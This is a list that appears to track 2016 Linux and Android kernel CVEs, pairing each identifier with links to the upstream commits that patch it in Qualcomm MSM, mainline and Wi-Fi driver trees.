-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=3bfe5a89916f7d29492e9f6d941d108b688cb804
-CVE-2016-10232
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=21e0ead58e47798567d846b84f16f89cf69a57ae
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=27f7b3b3059f6181e2786f886f4cd92f413bc30c
-CVE-2016-10233
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=d793c6d91ecba2a1fd206ad47a4fd408d290addf
-CVE-2016-10234
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=c7d7492c1e329fdeb28a7901c4cd634d41a996b1
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=d12370c7f3ecded1867fbd6b70ded35db55cab1d
-CVE-2016-10235
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=5bb0059243515ecdac138cfdb4cee7259bbd0bbc
-CVE-2016-10236
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=b8199c2b852f1e23c988e10b8fbb8d34c98b4a1c
-CVE-2016-10283
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=93863644b4547324309613361d70ad9dc91f8dfd
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=d60a5839ba987e2c9d365fef950cae0c9ad11010
-CVE-2016-10285
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=67dfd3a65336e0b3f55ee83d6312321dc5f2a6f9
-CVE-2016-10286
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=5d30a3d0dc04916ddfb972bfc52f8e636642f999
-CVE-2016-10287
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=937bc9e644180e258c68662095861803f7ba4ded
-CVE-2016-10288
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=db2cdc95204bc404f03613d5dd7002251fb33660
-CVE-2016-10289
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a604e6f3889ccc343857532b63dea27603381816
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=08a969c0e4c399df047c8055ac11a19e124500ed
-CVE-2016-10290
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a5e46d8635a2e28463b365aacdeab6750abd0d49
-CVE-2016-10291
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=c2b026dcd498c93a789b6b84dbe9a73c4a9d8135
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a225074c0494ca8125ca0ac2f9ebc8a2bd3612de
-CVE-2016-10293
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=2469d5374745a2228f774adbca6fb95a79b9047f
-CVE-2016-10294
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9e9bc51ffb8a298f0be5befe346762cdb6e1d49c
-CVE-2016-10295
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=f11ae3df500bc2a093ddffee6ea40da859de0fa9
-CVE-2016-10296
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a5e46d8635a2e28463b365aacdeab6750abd0d49
-CVE-2016-1583
-#	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e54ad7f1ee263ffa5a2de9c609d58dfa27b21cd9
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2f36db71009304b3f0b95afacd8eba1f9f046b87
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=29d6455178a09e1dc340380c582b13356227e8df
-CVE-2016-2053
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0d62e9dd6da45bbf0f33a8617afc5fe774c8f45f
-CVE-2016-2059
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9e8bdd63f7011dff5523ea435433834b3702398d
-CVE-2016-2060
-	Link - https://source.codeaurora.org/quic/la/platform/system/netd/commit/?id=e9925f5acb4401588e23ea8a27c3e318f71b5cf8
-CVE-2016-2061
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=79db14ca9f791a14be9376a0340ad3b9b9a4d603
-CVE-2016-2062
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/drivers/gpu/msm/adreno_perfcounter.c?id=27c95b64b2e4b5ff1288cbaa6e353dd803d71576
-CVE-2016-2063
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=ab3f46119ca10de87a11fe966b0723c48f27acd4
-CVE-2016-2064
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88
-CVE-2016-2065
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88
-CVE-2016-2066
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88
-CVE-2016-2066
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88
-CVE-2016-2067
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.18/commit/?id=410cfa95f0a1cf58819cbfbd896f9aa45b004ac0
-CVE-2016-2068
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?h=APSS.FSM.3.0&id=01ee86da5a0cd788f134e360e2be517ef52b6b00
-CVE-2016-2184
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=836b34a935abc91e13e63053d0a83b24dfb5ea78
-CVE-2016-2185
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=950336ba3e4a1ffd2ca60d29f6ef386dd2c7351d
-CVE-2016-2186
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9c6ba456711687b794dcf285856fc14e2c76074f
-CVE-2016-2187
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=162f98dea487206d9ab79fc12ed64700667a894d
-CVE-2016-2188
-	Depends
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4ec0ef3a82125efc36173062a50624550a900ae0
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b7321e81fc369abe353cf094d4f0dc2fe11ab95f
-CVE-2016-2384
-	Link - ^4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=07d86ca93db7e5cdf4743564d98292042ec21af7
-CVE-2016-2411
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=43e6938f37be0386fff4117e8aefff9be49bfe8a
-CVE-2016-2438
-	Link - https://github.com/torvalds/linux/commit/b5a663aa426f4884c71cd8580adae73f33570f0d
-CVE-2016-2441
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=6fb29c4773f632b7b6c31a8de56f55c32de3d350
-CVE-2016-2442
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=6fb29c4773f632b7b6c31a8de56f55c32de3d350
-CVE-2016-2443
-	Link - https://android.googlesource.com/kernel/msm/+/d22e409d672101e837d95c944161f072f894e682
-CVE-2016-2465
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=09dc4abecb0da388aedb37a57889c1ce2b267807
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=240f3bd82840fe6df7989339e465e9558f42fb85
-CVE-2016-2466
-	Link - https://android.googlesource.com/kernel/msm.git/+/8292fe595c99ccbcb5e73debdba21d5f1ad91ef6
-CVE-2016-2467
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=38b6131d78cecec5d970230aeee3cef485103d82
-CVE-2016-2468
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b5eb67744215b3434a36b9251e28da3dc2a638a6
-	Link - https://android.googlesource.com/kernel/msm.git/+/eb6cc9d4af6791d4d34075e3fa08f0c858087a8c
-CVE-2016-2469
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=e7369163162e7773bc887f7a264d6aa46cfcc665
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=7eb824e8e1ebbdbfad896b090a9f048ca6e63c9e
-CVE-2016-2469
-	Link - https://android.googlesource.com/kernel/msm/+/4029268991f478b98b6d37106af8f1f635c0b595
-CVE-2016-2470
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=05ce237387c6e1d101bbb4b825e56757576748e6
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=4fd81f97c3eaf42d506aa4f2b496862222c0a89d
-CVE-2016-2471
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=2c8961821b7691a95cbf5ecc6996e8229d6d5303
-CVE-2016-2472
-	Link - prima - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=464c9c8a984c3a36f63b1625d7ab2a1c9eec9697
-CVE-2016-2473
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/CORE/HDD/src/wlan_hdd_wext.c?id=0273cba64b0436d481e09222a631a6acc274b96c
-CVE-2016-2474
-	Depends
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=d541aecce07c65fee3ad3a4d900016e4d22f2b3d
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=681c310490e49adc43065d1d11006c5a5dc43568
-CVE-2016-2475
-	Link - https://android.googlesource.com/kernel/tegra/+/9f0aa0c3fede9abb0b5ccadeca95f848cc791fba
-CVE-2016-2477
-	Link - https://android.googlesource.com/platform/hardware/qcom/media/+/f22c2a0f0f9e030c240468d9d18b9297f001bcf0
-CVE-2016-2478
-	Link - https://android.googlesource.com/platform/hardware/qcom/media/+/f22c2a0f0f9e030c240468d9d18b9297f001bcf0
-CVE-2016-2480
-	Link - https://android.googlesource.com/platform/hardware/qcom/media/+/560ccdb509a7b86186fac0fce1b25bd9a3e6a6e8
-CVE-2016-2482
-	Link - https://android.googlesource.com/platform/hardware/qcom/media/+/46e305be6e670a5a0041b0b4861122a0f1aabefa
-CVE-2016-2488
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=91ea960b91250eca57d8fbdb8aafa11d80695d46
-CVE-2016-2498
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=1d23dacdbd6b3a2b59b952f2fa3a578f9d15f60f
-CVE-2016-2501
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=0ee6c6f748e840c266fe26ed3c89d6bd7e3c9d4e
-CVE-2016-2502
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=0bc45d7712eabe315ce8299a49d16433c3801156
-CVE-2016-2503
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=0c46fc0f8fb7ffd26557b51b235d463a01ee75f5
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=9ae71bc3a542f68ea93c4eff01a41201ee6d9402
-CVE-2016-2504
-	Link - 3.4-^3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f7c8dfd7060867d71fc370527e2e2278ffc3ba5e
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=75adbb8cebfe17ace640e6bd89582c1d72196378
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=APSS.FSM.3.0&id=ec5feea777b07c0e1f9ce45b7f3179a3f6facf75
-CVE-2016-2544
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=3567eb6af614dac436c4b16a8d426f9faed639b3
-CVE-2016-2545
-	Link - ^4.4 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ee8413b01045c74340aa13ad5bdf905de32be736
-CVE-2016-2546
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=af368027a49a751d6ff4ee9e3f9961f35bb4fede
-CVE-2016-2547
-	Link - ^4.4 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5a663aa426f4884c71cd8580adae73f33570f0d
-CVE-2016-2549
-	Link - ^4.4 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2ba1fe7a06d3624f9a7586d672b55f08f7c670f3
-CVE-2016-2847
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=759c01142a5d0f364a462346168a56de28a80f52
-CVE-2016-3070
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=af110cc4b24250faafd4f3b9879cf51e350d7799
-CVE-2016-3134
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=54d83fc74aa9ec72794373cb47432c5f7fb1a309
-CVE-2016-3135
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d157bd761585605b7882935ffb86286919f62ea1
-CVE-2016-3136
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4e9a0b05257f29cf4b75f3209243ed71614d062e
-CVE-2016-3137
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c55aee1bf0e6b6feec8b2927b43f7a09a6d5f754
-CVE-2016-3138
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8835ba4a39cf53f705417b3b3a94eb067673f2c9
-CVE-2016-3140
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5a07975ad0a36708c6b0a5b9fea1ff811d0b0c1f
-CVE-2016-3156
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fbd40ea0180a2d328c5adc61414dc8bab9335ce2
-CVE-2016-3672
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8b8addf891de8a00e4d39fc32f93f7c5eb8feceb
-CVE-2016-3689
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a0ad220c96692eda76b2e3fd7279f3dcd1d8a8ff
-CVE-2016-3746
-	Link - https://source.codeaurora.org/quic/la//platform/hardware/qcom/media/commit/?id=c2e66c4ee83b4264d691d8aaabb2e94744df1e25
-CVE-2016-3747
-	Link - https://source.codeaurora.org/quic/la//platform/hardware/qcom/media/commit/?id=905826825e4459c0dfc9d6475e950d6be3a16fc7
-CVE-2016-3768
-	Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=d75be03af111fb5a31eba82f665242e6d8b07008
-	Link - https://github.com/android/kernel_msm/commit/84d8c81420aaa7c6cd6f57cb52daccf07b1f7a50
-CVE-2016-3775
-	Link - 3.4 - https://github.com/android/kernel_msm/commit/dc18eac80caaa12ff7072df9fe857b921e8c26c7
-	Link - 3.4 - https://review.lineageos.org/81123
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/8096090858689395a75bbf696ff8276c3c236b98
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/b1568c363c54fa3aa98b1cfa7c535115950bec0c
-CVE-2016-3792
-	Link - prima - https://us.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=28d4f0c1f712bffb4aa5b47f06e97d5a9fa06d29
-CVE-2016-3797
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=fdda9c0af64d6e5cdf006e2d8dd57e655821a962
-CVE-2016-3809
-	Link - https://android.googlesource.com/kernel/msm/+/f2152040cb3c13fa846914df1ad44a8a7fd2e935
-CVE-2016-3813
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=3c0add95808fdada98ba0ab465c0b4ba49e71d26
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=de81d402f12a3492400644024e694748d3514951
-CVE-2016-3841
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=45f6fad84cc305103b28d73482b344d7f5b76f39
-CVE-2016-3842
-	Link - 3.4 - https://github.com/aosp-mirror/kernel_msm/commit/15701ca335357e98a0eb98ef079fe45e3b830591
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/f5f0a2fe84b589793baa5713ea2aa16779e00d5e
-	Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/905de01dda0bc6663f8ce5c8f0f3831dae49bb36
-CVE-2016-3843
-	Depends
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=e65cc8f9c46c6b8119826fbc22ffeb4e96e80e8a
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=149cf87192059fab0cb49ec5c691783c3565c215
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=8fe72ba71e08fbc2c5a5d4985557247904d76054
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=15c897f31ba18f67559d6b7f1a6afa855baa756c
-CVE-2016-3850
-	Link - https://source.codeaurora.org/quic/la//kernel/lk/commit/?id=9a59b04c8ed8b57537f2f3cbcb06645575f64ac1
-CVE-2016-3854
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?h=LA.AF.1.2.1_rb1.5&id=cc96def76dfd18fba88575065b29f2ae9191fafa
-CVE-2016-3855
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ab3f46119ca10de87a11fe966b0723c48f27acd4
-CVE-2016-3857
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.10.107&id=d948109df11c8485e972b4cc0eb4820d4b754615
-CVE-2016-3858
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=cab2ba71f13f04aa73c8b8dadc3fc184205c9474
-CVE-2016-3859
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=fe297dc01f7ea95bb1bff25f6fc4257f0ef832ff
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=61b419297e13ed9a28e9b880548b2d96d4aa6c0d
-CVE-2016-3860
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/sound/soc/msm/qdsp6v2/audio_calibration.c?id=528976f54be246ec93a71ac53aa4faf3e3791c48
-CVE-2016-3865
-	Link - https://github.com/android/kernel_msm/commit/a92e71c20f4e6b2aa94b7614fd494833ea76b8b9
-	Link - https://github.com/android/kernel_msm/commit/92242610894d1dc26759e486af1d11f2eb78c922
-CVE-2016-3866
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=5180cefe0eeb6f3e6e0c4967652facd20f07c20c
-CVE-2016-3867
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=816da3d19cfee937f5add485a112bb1cdfcb72c8
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=b518b33d4b7da7df5a0348a97ffb4f35be819937
-CVE-2016-3868
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=17014696ce3836c91215b6d6dd82f3befd6e7d4d
-CVE-2016-3874
-	Depends
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=50e8f265b3f7926aeb4e49c33f7301ace89faa77
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=a3974e61c960aadcc147c3c5704a67309171642d
-CVE-2016-3892
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=dd40cc2bd210dd7a4dd649e8f79add2bbeda2bd5
-CVE-2016-3893
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=a7a6ddc91cce7ad5ad55c9709b24bfc80f5ac873
-CVE-2016-3894
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=de3e3e5930b1edfebec7870390443279ec5b65fe
-CVE-2016-3901
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=5f69ccf3b011c1d14a1b1b00dbaacf74307c9132
-CVE-2016-3902
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=2fca425d781572393fbe51abe2e27a932d24a768
-CVE-2016-3903
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b8874573428e8ce024f57c6242d662fcca5e5d55
-CVE-2016-3904
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=069683407ca9a820d05c914b57c587bcd3f16a3a
-CVE-2016-3905
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=b5112838eb91b71eded4b5ee37338535784e0aef
-CVE-2016-3906
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=b333d32745fec4fb1098ee1a03d4425f3c1b4c2e
-CVE-2016-3907
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=744330f4e5d70dce71c4c9e03c5b6a8b59bb0cda
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=289ede9d6bfb46178326ae9ca86033bbd452f269
-CVE-2016-3931
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e80b88323f9ff0bb0e545f209eec08ec56fca816
-CVE-2016-3934
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=27fbeb6b025d5d46ccb0497cbed4c6e78ed1c5cc
-CVE-2016-3935
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=5f69ccf3b011c1d14a1b1b00dbaacf74307c9132
-CVE-2016-3938
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=467c81f9736b1ebc8d4ba70f9221bba02425ca10
-CVE-2016-3939
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=e0bb18771d6ca71db2c2a61226827059be3fa424
-CVE-2016-3951
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4d06dd537f95683aba3651098ae288b7cbff8274
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1666984c8625b3db19a9abc298931d35ab7bc64b
-CVE-2016-4470
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=38327424b40bcebe2de92d07312c89360ac9229a
-CVE-2016-4482
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=681fef8380eb818c0b845fca5d2ab1dcbab114ee
-CVE-2016-4486
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5f8e44741f9f216e33736ea4ec65ca9ac03036e6
-CVE-2016-4569
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cec8f96e49d9be372fdb0c3836dcf31ec71e457e
-CVE-2016-4578
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e4ec8cc8039a7063e24204299b462bd1383184a5
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9a47e9cff994f37f7f0dbd9ae23740d0f64f9fe6
-CVE-2016-4794
-	Link - 3.18+ - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=6710e594f71ccaad8101bc64321152af7cd9ea28
-	Link - 3.18+ - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=4f996e234dad488e5d9ba0858bc1bae12eff82c3
-CVE-2016-4805
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1f461dcdd296eecedaffffc6bae2bfa90bd7eb89
-CVE-2016-4998
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bdf533de6968e9686df777dc178486f600c6e617
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91
-CVE-2016-5195
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=9691eac5593ff1e2f82391ad327f21d90322aec1
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=e45a502bdeae5a075257c4f061d1ff4ff0821354
-CVE-2016-5340
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=06e51489061e5473b4e2035c79dcf7c27a6f75a6
-CVE-2016-5342
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=579e796cb089324c55e0e689a180575ba81b23d9
-CVE-2016-5343
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=6927e2e0af4dcac357be86ba563c9ae12354bb08
-CVE-2016-5344
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=64e15c36d6c1c57dc2d95a3f163bc830a469fc20
-CVE-2016-5345
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=67118716a2933f6f30a25ea7e3946569a8b191c6
-CVE-2016-5346
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=6298a474322fb2182f795a622b2faa64abfd8474
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=25a64e34bbec7b14887cbfe8266ccf6f27113bab
-CVE-2016-5347
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=ed4d6f5d8451d99860950d0abf8ad583efed6d5c
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=f14390f13e62460fc6b05fc0acde0e825374fdb6
-CVE-2016-5349
-	Depends
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=7c3bf6557c62d904b15507eb451fda8fd7ef750c
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=03853a58952834ac3e1e3007c9c680dd4c001a2f
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=e3d969000fb60ecb9bc01667fa89957f67763514
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=9bd398661cae758ffc557adc7de74ba32654e1f9
-CVE-2016-5696
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=75ff39ccc1bd5d3c455b6822ab09e533c551f758
-CVE-2016-5829
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/drivers/hid/usbhid/hiddev.c?h=LA.UM.5.5.r1-04000-8x96.0&id=af37375834fe1dd7a7a08c6042664ffc2a1a3beb
-CVE-2016-5853
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=e879fc7eca7e3ba0ab9dcf24d2f717e49718a01e
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=49d27afe9a76273e0d5314cf9241d1d1c3561d13
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=a8f3b894de319718aecfc2ce9c691514696805be
-CVE-2016-5854
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=28d23d4d7999f683b27b6e0c489635265b67a4c9
-CVE-2016-5855
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=a5edb54e93ba85719091fe2bc426d75fa7059834
-CVE-2016-5856
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=0c0622914ba53cdcb6e79e85f64bfdf7762c0368
-CVE-2016-5857
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=d9d2c405d46ca27b25ed55a8dbd02bd1e633e2d5
-CVE-2016-5858
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=3154eb1d263b9c3eab2c9fa8ebe498390bf5d711
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=afc5bea71bc8f251dad1104568383019f4923af6
